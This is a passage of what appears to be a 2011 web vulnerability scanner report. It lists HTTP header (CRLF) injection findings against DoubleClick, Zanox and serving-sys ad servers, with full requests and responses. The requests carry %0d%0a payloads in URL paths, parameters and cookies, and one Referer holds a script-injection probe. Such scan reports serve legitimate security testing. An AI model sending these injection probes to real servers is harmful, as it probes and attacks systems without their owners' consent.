Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5dc39
0f8fde46ef2
/N815.zdenterprise/B5069510.14%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D:
Date: Sun, 06 Feb 2011 13:22:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.6. http://ad.doubleclick.net/ad/N815.zdenterprise/B5069510.30 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N815.zdenterprise/B5069510.30

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5ecae%0d%0aaf16c007475 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5ecae%0d%0aaf16c007475/N815.zdenterprise/B5069510.30;sz=1x1;ord=%n? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5ecae
af16c007475
/N815.zdenterprise/B5069510.30%3Bsz%3D1x1%3Bord%3D%25n:
Date: Sun, 06 Feb 2011 13:22:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.7. http://ad.doubleclick.net/ad/N815.zdenterprise/B5069510.9 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N815.zdenterprise/B5069510.9

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2f022%0d%0a00140ddecd3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2f022%0d%0a00140ddecd3/N815.zdenterprise/B5069510.9;sz=1x1;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2f022
00140ddecd3
/N815.zdenterprise/B5069510.9%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D:
Date: Sun, 06 Feb 2011 13:22:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.8. http://ad.doubleclick.net/ad/entzd.eweek/ibmtutorial [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/entzd.eweek/ibmtutorial

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 36cf6%0d%0a6a7c8a5efd6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /36cf6%0d%0a6a7c8a5efd6/entzd.eweek/ibmtutorial;sz=1x1;ord=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/36cf6
6a7c8a5efd6
/entzd.eweek/ibmtutorial%3Bsz%3D1x1%3Bord%3D1:
Date: Sun, 06 Feb 2011 13:22:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.9. http://ad.doubleclick.net/ad/entzd.eweek/ibmwidget/cloudimu [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/entzd.eweek/ibmwidget/cloudimu

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 17ca4%0d%0a41f12a81071 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /17ca4%0d%0a41f12a81071/entzd.eweek/ibmwidget/cloudimu;sz=1x1;ord=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/17ca4
41f12a81071
/entzd.eweek/ibmwidget/cloudimu%3Bsz%3D1x1%3Bord%3D1:
Date: Sun, 06 Feb 2011 13:22:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.10. http://ad.doubleclick.net/ad/entzd.eweek/ibmwidget/virtimu [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/entzd.eweek/ibmwidget/virtimu

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22974%0d%0a6a1f47d2342 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22974%0d%0a6a1f47d2342/entzd.eweek/ibmwidget/virtimu;sz=1x1;ord=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/22974
6a1f47d2342
/entzd.eweek/ibmwidget/virtimu%3Bsz%3D1x1%3Bord%3D1:
Date: Sun, 06 Feb 2011 13:22:40 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.11. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 14c2c%0d%0ab2351d233db was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /14c2c%0d%0ab2351d233db/N553.158901.DATAXU/B4970757.11;sz=468x60;pc=[TPAS_ID];ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2818894/957634/15009,2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/14c2c
b2351d233db
/N553.158901.DATAXU/B4970757.11%3Bsz%3D468x60%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D%5Btimestamp%5D:
Date: Sat, 05 Feb 2011 21:49:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.12. http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.158901.DATAXU/B4970757.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 42c36%0d%0abbd914c4d3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /42c36%0d%0abbd914c4d3b/N553.158901.DATAXU/B4970757.11 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/42c36
bbd914c4d3b
/N553.158901.DATAXU/B4970757.11:
Date: Sat, 05 Feb 2011 21:50:28 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

3.13. http://ad.doubleclick.net/adj/entzd.base/itmanagement [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/entzd.base/itmanagement

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 75aa0%0d%0a89c0f58a50b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /75aa0%0d%0a89c0f58a50b/entzd.base/itmanagement HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/75aa0
89c0f58a50b
/entzd.base/itmanagement:
Date: Sun, 06 Feb 2011 17:17:44 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

3.14. http://ad.doubleclick.net/adj/oiq.man.homeappliance/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/oiq.man.homeappliance/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 80fc5%0d%0a18367c4310e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /80fc5%0d%0a18367c4310e/oiq.man.homeappliance/;mfg=145;tile=1;sz=720x90,728x90;ord=1296942753;u=mfg_145%7Csid_ HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/80fc5
18367c4310e
/oiq.man.homeappliance/%3Bmfg%3D145%3Btile%3D1%3Bsz%3D720x90%2C728x90%3Bord%3D1296942753%3Bu%3Dmfg_145%7Csid_:
Date: Sat, 05 Feb 2011 22:27:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.15. http://ad.doubleclick.net/jump/N553.158901.DATAXU/B4970757.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N553.158901.DATAXU/B4970757.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 56f15%0d%0a1b7eaef4d04 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /56f15%0d%0a1b7eaef4d04/N553.158901.DATAXU/B4970757.11 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/56f15
1b7eaef4d04
/N553.158901.DATAXU/B4970757.11:
Date: Sat, 05 Feb 2011 21:50:29 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

3.16. http://ad.zanox.com/tpv/ [14786739C435671106&ULP parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.zanox.com
Path:   /tpv/

Issue detail

The value of the 14786739C435671106&ULP request parameter is copied into the Location response header. The payload d2ed0%0d%0acf60b7507b4 was submitted in the 14786739C435671106&ULP parameter. This caused a response containing an injected HTTP header.

Request

GET /tpv/?14786739C435671106&ULP=d2ed0%0d%0acf60b7507b4&zpar0=125_1_728x90_360_pvc_ad4matdedault HTTP/1.1
Host: ad.zanox.com
Proxy-Connection: keep-alive
Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 06 Feb 2011 17:39:07 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP"
X-Powered-By: ASP.NET
Set-Cookie: zttpvc=5C114178S1469386944579519491T0I14786739C0T0; domain=.zanox.com; path=/
Set-Cookie: zptpvc=5C114178S1469386944579519491T0I14786739C0T0; expires=Sat, 07-May-2011 17:39:07 GMT; domain=.zanox.com; path=/
Content-Length: 0
Location: http://www.bild.ded2ed0
cf60b7507b4
&zpar0=125_1_728x90_360_pvc_ad4matdedault?zanpid=14786739C435671106T1469386944579519491
pragma: no-cache
cache-control: no-store


3.17. http://ad.zanox.com/tpv/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.zanox.com
Path:   /tpv/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 96c36%0d%0a1e76b109467 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /tpv/?14786739C435671106&ULP=http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=125_1_728x90_360_pvc_ad4matdedault&96c36%0d%0a1e76b109467=1 HTTP/1.1
Host: ad.zanox.com
Proxy-Connection: keep-alive
Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 06 Feb 2011 17:40:04 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP"
X-Powered-By: ASP.NET
Set-Cookie: zttpvc=5C322704S1469387185567450118T0I14786739C0T0; domain=.zanox.com; path=/
Set-Cookie: zptpvc=5C322704S1469387185567450118T0I14786739C0T0; expires=Sat, 07-May-2011 17:40:04 GMT; domain=.zanox.com; path=/
Content-Length: 0
Location: http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=125_1_728x90_360_pvc_ad4matdedault&96c36
1e76b109467
=1&zanpid=14786739C435671106T1469387185567450118
pragma: no-cache
cache-control: no-store


3.18. http://ad.zanox.com/tpv/ [zpar0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.zanox.com
Path:   /tpv/

Issue detail

The value of the zpar0 request parameter is copied into the Location response header. The payload 8b1c7%0d%0aa5975a40bc was submitted in the zpar0 parameter. This caused a response containing an injected HTTP header.

Request

GET /tpv/?14786739C435671106&ULP=http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=8b1c7%0d%0aa5975a40bc HTTP/1.1
Host: ad.zanox.com
Proxy-Connection: keep-alive
Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 06 Feb 2011 17:39:12 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP"
X-Powered-By: ASP.NET
Set-Cookie: zttpvc=5C127423S1469386967060988934T0I14786739C0T0; domain=.zanox.com; path=/
Set-Cookie: zptpvc=5C127423S1469386967060988934T0I14786739C0T0; expires=Sat, 07-May-2011 17:39:12 GMT; domain=.zanox.com; path=/
Content-Length: 0
Location: http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=8b1c7
a5975a40bc
&zanpid=14786739C435671106T1469386967060988934
pragma: no-cache
cache-control: no-store


3.19. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 803fb%0d%0a71e6bfcf0d1 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0803fb%0d%0a71e6bfcf0d1; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ84ZE0000000001t67GHq0000000001s.7FCH0000000001s.84ZF0000000002t683xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gYRSaeKR09sO00001gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001gHrHaeKS09sO00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz010; C4=; ActivityInfo=000p81bCx%5f; u3=1;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0803fb
71e6bfcf0d1
; expires=Sat, 07-May-2011 12: 18:54 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz01g; expires=Sat, 07-May-2011 12:18:54 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 06 Feb 2011 17:18:54 GMT
Connection: close


3.20. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 3b588%0d%0ae9f2ac9bef5 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=03b588%0d%0ae9f2ac9bef5; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ84ZE0000000001t67GHq0000000001s.7FCH0000000001s.84ZF0000000002t683xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gYRSaeKR09sO00001gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001gHrHaeKS09sO00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz010; C4=; ActivityInfo=000p81bCx%5f; u3=1;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=03b588
e9f2ac9bef5
; expires=Sat, 07-May-2011 12: 18:54 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz01g; expires=Sat, 07-May-2011 12:18:54 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 06 Feb 2011 17:18:54 GMT
Connection: close


3.21. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the bwVal request parameter is copied into the Set-Cookie response header. The payload c3e38%0d%0aea51dd9334e was submitted in the bwVal parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4363488~~0~~~^ebAdDuration~10~0~01020^ebAboveTheFoldDuration~9~0~01020^ebAboveTheFold~0~0~01020|4443510~~0~~~^ebAdDuration~1~0~01020^ebAboveTheFoldDuration~1~0~01020^ebAboveTheFold~0~0~01020&OptOut=0&ebRandom=0.8359781634062529&flv=10.1103&wmpv=0&res=128&bwVal=c3e38%0d%0aea51dd9334e&bwTime=1296998548216 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Origin: http://www.baselinemag.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
